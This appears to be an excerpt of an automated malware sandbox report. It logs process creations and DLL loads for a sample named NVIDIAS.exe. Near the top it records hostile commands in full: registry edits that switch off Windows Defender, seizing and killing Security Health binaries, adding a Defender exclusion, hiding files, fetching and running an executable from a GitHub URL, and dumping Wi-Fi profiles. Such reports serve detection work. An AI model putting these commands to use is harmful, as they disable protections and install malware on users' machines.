Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\cacls.exe "C:\Windows\system32\cacls.exe" "C:\Windows\system32\config\system" | Jump to behavior |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -window hidden -command "" | Jump to behavior |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\reg.exe REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /f /v "DisableBehaviorMonitoring" /t REG_DWORD /d 1 | Jump to behavior |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\reg.exe REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /f /v "DisableOnAccessProtection" /t REG_DWORD /d 1 | Jump to behavior |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\reg.exe REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /f /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d 1 | Jump to behavior |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\reg.exe REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /f /v "DisableAntiSpyware" /t REG_DWORD /d 1 | Jump to behavior |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\reg.exe reg delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /f /v "SecurityHealth" | Jump to behavior |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\takeown.exe takeown /f "C:\Windows\System32\SecurityHealthService.exe" | Jump to behavior |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\icacls.exe icacls "C:\Windows\System32\SecurityHealthService.exe" /grant:r "computer\user":F /c | Jump to behavior |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\takeown.exe takeown /f "C:\Windows\System32\SecurityHealthSystray.exe" | Jump to behavior |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\icacls.exe icacls "C:\Windows\System32\SecurityHealthSystray.exe" /grant:r "computer\user":F /c | Jump to behavior |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\taskkill.exe taskkill /IM SecurityHealthSystray.exe /F | Jump to behavior |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -command "Add-MpPreference -ExclusionPath "C:\ProgramData\QQQ | Jump to behavior |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\timeout.exe timeout.exe /t 10 | Jump to behavior |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\attrib.exe attrib +h "QQQ" /s /d | Jump to behavior |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Invoke-WebRequest 'https://github.com/pr0niums/Repo/raw/refs/heads/main/NVIDIAS.exe' -OutFile 'NVIDIAS.exe'" | Jump to behavior |
Source: C:\Windows\System32\cmd.exe | Process created: C:\ProgramData\QQQ\NVIDIAS.exe NVIDIAS.exe | Jump to behavior |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\attrib.exe attrib +h "C:\ProgramData\QQQ\NVIDIAS.exe" /s /d | Jump to behavior |
Source: C:\ProgramData\QQQ\NVIDIAS.exe | Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /c tasklist | Jump to behavior |
Source: C:\ProgramData\QQQ\NVIDIAS.exe | Process created: C:\Windows\SysWOW64\cmd.exe "cmd" /C chcp 65001 && netsh wlan show profiles | findstr All | Jump to behavior |
Source: C:\ProgramData\QQQ\NVIDIAS.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C C:\Users\user\AppData\Local\Temp\tmp6F58.tmp.bat & Del C:\Users\user\AppData\Local\Temp\tmp6F58.tmp.bat | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\tasklist.exe tasklist | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\chcp.com chcp 65001 | |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profiles | |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\findstr.exe findstr All | |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\chcp.com chcp 65001 | |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\taskkill.exe TaskKill /F /IM 716 | |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\timeout.exe Timeout /T 2 /Nobreak | |
Source: C:\Windows\SysWOW64\WerFault.exe | Process created: unknown unknown | |
Source: C:\Windows\System32\cmd.exe | Section loaded: cmdext.dll | Jump to behavior |
Source: C:\Windows\System32\cmd.exe | Section loaded: apphelp.dll | Jump to behavior |
Source: C:\Windows\System32\cacls.exe | Section loaded: ntmarta.dll | Jump to behavior |
Source: C:\Windows\System32\cacls.exe | Section loaded: ntmarta.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: edgegdi.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: xmllite.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll | Jump to behavior |
Source: C:\Windows\System32\takeown.exe | Section loaded: sspicli.dll | Jump to behavior |
Source: C:\Windows\System32\takeown.exe | Section loaded: ntmarta.dll | Jump to behavior |
Source: C:\Windows\System32\icacls.exe | Section loaded: ntmarta.dll | Jump to behavior |
Source: C:\Windows\System32\takeown.exe | Section loaded: sspicli.dll | Jump to behavior |
Source: C:\Windows\System32\takeown.exe | Section loaded: ntmarta.dll | Jump to behavior |
Source: C:\Windows\System32\icacls.exe | Section loaded: ntmarta.dll | Jump to behavior |
Source: C:\Windows\System32\taskkill.exe | Section loaded: version.dll | Jump to behavior |
Source: C:\Windows\System32\taskkill.exe | Section loaded: mpr.dll | Jump to behavior |
Source: C:\Windows\System32\taskkill.exe | Section loaded: framedynos.dll | Jump to behavior |
Source: C:\Windows\System32\taskkill.exe | Section loaded: dbghelp.dll | Jump to behavior |
Source: C:\Windows\System32\taskkill.exe | Section loaded: sspicli.dll | Jump to behavior |
Source: C:\Windows\System32\taskkill.exe | Section loaded: srvcli.dll | Jump to behavior |
Source: C:\Windows\System32\taskkill.exe | Section loaded: netutils.dll | Jump to behavior |
Source: C:\Windows\System32\taskkill.exe | Section loaded: sspicli.dll | Jump to behavior |
Source: C:\Windows\System32\taskkill.exe | Section loaded: edgegdi.dll | Jump to behavior |
Source: C:\Windows\System32\taskkill.exe | Section loaded: kernel.appcore.dll | Jump to behavior |
Source: C:\Windows\System32\taskkill.exe | Section loaded: wbemcomn.dll | Jump to behavior |
Source: C:\Windows\System32\taskkill.exe | Section loaded: winsta.dll | Jump to behavior |
Source: C:\Windows\System32\taskkill.exe | Section loaded: amsi.dll | Jump to behavior |
Source: C:\Windows\System32\taskkill.exe | Section loaded: userenv.dll | Jump to behavior |
Source: C:\Windows\System32\taskkill.exe | Section loaded: profapi.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: edgegdi.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: xmllite.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wininet.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: microsoft.management.infrastructure.native.unmanaged.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mi.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: miutils.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wmidcom.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dpapi.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll | Jump to behavior |
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: fastprox.dll | Jump to behavior |
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: ncobjapi.dll | Jump to behavior |
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: wbemcomn.dll | Jump to behavior |
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: wbemcomn.dll | Jump to behavior |
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: edgegdi.dll | Jump to behavior |
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: kernel.appcore.dll | Jump to behavior |
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: mpclient.dll | Jump to behavior |
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: version.dll | Jump to behavior |
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: wmitomi.dll | Jump to behavior |
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: mi.dll | Jump to behavior |
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: miutils.dll | Jump to behavior |
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: userenv.dll | Jump to behavior |
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: gpapi.dll | Jump to behavior |
Source: C:\Windows\System32\timeout.exe | Section loaded: version.dll | Jump to behavior |
Source: C:\Windows\System32\timeout.exe | Section loaded: edgegdi.dll | Jump to behavior |
Source: C:\Windows\System32\attrib.exe | Section loaded: ulib.dll | Jump to behavior |
Source: C:\Windows\System32\attrib.exe | Section loaded: fsutilext.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: edgegdi.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: xmllite.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iphlpapi.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dnsapi.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dhcpcsvc6.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dhcpcsvc.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winnsi.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasapi32.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasman.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rtutils.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mswsock.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winhttp.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ondemandconnroutehelper.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasadhlp.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: fwpuclnt.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: schannel.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mskeyprotect.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ntasn1.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ncrypt.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ncryptsslp.dll | Jump to behavior |
Source: C:\ProgramData\QQQ\NVIDIAS.exe | Section loaded: mscoree.dll | Jump to behavior |
Source: C:\ProgramData\QQQ\NVIDIAS.exe | Section loaded: apphelp.dll | Jump to behavior |
Source: C:\ProgramData\QQQ\NVIDIAS.exe | Section loaded: kernel.appcore.dll | Jump to behavior |
Source: C:\ProgramData\QQQ\NVIDIAS.exe | Section loaded: version.dll | Jump to behavior |
Source: C:\ProgramData\QQQ\NVIDIAS.exe | Section loaded: vcruntime140_clr0400.dll | Jump to behavior |
Source: C:\ProgramData\QQQ\NVIDIAS.exe | Section loaded: ucrtbase_clr0400.dll | Jump to behavior |
Source: C:\ProgramData\QQQ\NVIDIAS.exe | Section loaded: ucrtbase_clr0400.dll | Jump to behavior |
Source: C:\ProgramData\QQQ\NVIDIAS.exe | Section loaded: edgegdi.dll | Jump to behavior |
Source: C:\ProgramData\QQQ\NVIDIAS.exe | Section loaded: mswsock.dll | Jump to behavior |
Source: C:\ProgramData\QQQ\NVIDIAS.exe | Section loaded: windows.storage.dll | Jump to behavior |
Source: C:\ProgramData\QQQ\NVIDIAS.exe | Section loaded: wldp.dll | Jump to behavior |
Source: C:\ProgramData\QQQ\NVIDIAS.exe | Section loaded: profapi.dll | Jump to behavior |
Source: C:\ProgramData\QQQ\NVIDIAS.exe | Section loaded: cryptsp.dll | Jump to behavior |
Source: C:\ProgramData\QQQ\NVIDIAS.exe | Section loaded: rsaenh.dll | Jump to behavior |
Source: C:\ProgramData\QQQ\NVIDIAS.exe | Section loaded: cryptbase.dll | Jump to behavior |
Source: C:\ProgramData\QQQ\NVIDIAS.exe | Section loaded: napinsp.dll | Jump to behavior |
Source: C:\ProgramData\QQQ\NVIDIAS.exe | Section loaded: pnrpnsp.dll | Jump to behavior |
Source: C:\ProgramData\QQQ\NVIDIAS.exe | Section loaded: wshbth.dll | Jump to behavior |
Source: C:\ProgramData\QQQ\NVIDIAS.exe | Section loaded: nlaapi.dll | Jump to behavior |
Source: C:\ProgramData\QQQ\NVIDIAS.exe | Section loaded: iphlpapi.dll | Jump to behavior |
Source: C:\ProgramData\QQQ\NVIDIAS.exe | Section loaded: dnsapi.dll | Jump to behavior |
Source: C:\ProgramData\QQQ\NVIDIAS.exe | Section loaded: winrnr.dll | Jump to behavior |
Source: C:\ProgramData\QQQ\NVIDIAS.exe | Section loaded: dhcpcsvc6.dll | Jump to behavior |
Source: C:\ProgramData\QQQ\NVIDIAS.exe | Section loaded: dhcpcsvc.dll | Jump to behavior |
Source: C:\ProgramData\QQQ\NVIDIAS.exe | Section loaded: winnsi.dll | Jump to behavior |
Source: C:\ProgramData\QQQ\NVIDIAS.exe | Section loaded: sspicli.dll | Jump to behavior |
Source: C:\ProgramData\QQQ\NVIDIAS.exe | Section loaded: wbemcomn.dll | Jump to behavior |
Source: C:\ProgramData\QQQ\NVIDIAS.exe | Section loaded: amsi.dll | Jump to behavior |
Source: C:\ProgramData\QQQ\NVIDIAS.exe | Section loaded: userenv.dll | Jump to behavior |
Source: C:\ProgramData\QQQ\NVIDIAS.exe | Section loaded: uxtheme.dll | Jump to behavior |
Source: C:\ProgramData\QQQ\NVIDIAS.exe | Section loaded: dwrite.dll | Jump to behavior |
Source: C:\ProgramData\QQQ\NVIDIAS.exe | Section loaded: windowscodecs.dll | Jump to behavior |
Source: C:\ProgramData\QQQ\NVIDIAS.exe | Section loaded: rasapi32.dll | Jump to behavior |
Source: C:\ProgramData\QQQ\NVIDIAS.exe | Section loaded: rasman.dll | Jump to behavior |
Source: C:\ProgramData\QQQ\NVIDIAS.exe | Section loaded: rtutils.dll | Jump to behavior |
Source: C:\ProgramData\QQQ\NVIDIAS.exe | Section loaded: winhttp.dll | Jump to behavior |
Source: C:\ProgramData\QQQ\NVIDIAS.exe | Section loaded: ondemandconnroutehelper.dll | Jump to behavior |
Source: C:\ProgramData\QQQ\NVIDIAS.exe | Section loaded: rasadhlp.dll | Jump to behavior |
Source: C:\ProgramData\QQQ\NVIDIAS.exe | Section loaded: fwpuclnt.dll | Jump to behavior |
Source: C:\ProgramData\QQQ\NVIDIAS.exe | Section loaded: edputil.dll | Jump to behavior |
Source: C:\ProgramData\QQQ\NVIDIAS.exe | Section loaded: ntmarta.dll | Jump to behavior |
Source: C:\ProgramData\QQQ\NVIDIAS.exe | Section loaded: propsys.dll | Jump to behavior |
Source: C:\ProgramData\QQQ\NVIDIAS.exe | Section loaded: urlmon.dll | Jump to behavior |
Source: C:\ProgramData\QQQ\NVIDIAS.exe | Section loaded: iertutil.dll | Jump to behavior |
Source: C:\ProgramData\QQQ\NVIDIAS.exe | Section loaded: srvcli.dll | Jump to behavior |
Source: C:\ProgramData\QQQ\NVIDIAS.exe | Section loaded: netutils.dll | Jump to behavior |
Source: C:\ProgramData\QQQ\NVIDIAS.exe | Section loaded: windows.staterepositoryps.dll | Jump to behavior |
Source: C:\ProgramData\QQQ\NVIDIAS.exe | Section loaded: wintypes.dll | Jump to behavior |
Source: C:\ProgramData\QQQ\NVIDIAS.exe | Section loaded: appresolver.dll | Jump to behavior |
Source: C:\ProgramData\QQQ\NVIDIAS.exe | Section loaded: bcp47langs.dll | Jump to behavior |
Source: C:\ProgramData\QQQ\NVIDIAS.exe | Section loaded: slc.dll | Jump to behavior |
Source: C:\ProgramData\QQQ\NVIDIAS.exe | Section loaded: sppc.dll | Jump to behavior |
Source: C:\ProgramData\QQQ\NVIDIAS.exe | Section loaded: onecorecommonproxystub.dll | Jump to behavior |
Source: C:\ProgramData\QQQ\NVIDIAS.exe | Section loaded: onecoreuapcommonproxystub.dll | Jump to behavior |
Source: C:\Windows\System32\attrib.exe | Section loaded: ulib.dll | Jump to behavior |
Source: C:\Windows\System32\attrib.exe | Section loaded: fsutilext.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: version.dll | |
Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: mpr.dll | |
Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: framedynos.dll | |
Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: dbghelp.dll | |
Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: sspicli.dll | |
Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: srvcli.dll | |
Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: netutils.dll | |
Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: sspicli.dll | |
Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: edgegdi.dll | |
Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: kernel.appcore.dll | |
Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: wbemcomn.dll | |
Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: winsta.dll | |
Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: amsi.dll | |
Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: userenv.dll | |
Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: profapi.dll | |
Source: C:\Windows\SysWOW64\chcp.com | Section loaded: ulib.dll | |
Source: C:\Windows\SysWOW64\chcp.com | Section loaded: fsutilext.dll | |
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: kernel.appcore.dll | |
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: ifmon.dll | |
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: iphlpapi.dll | |
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: mprapi.dll | |
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: rasmontr.dll | |
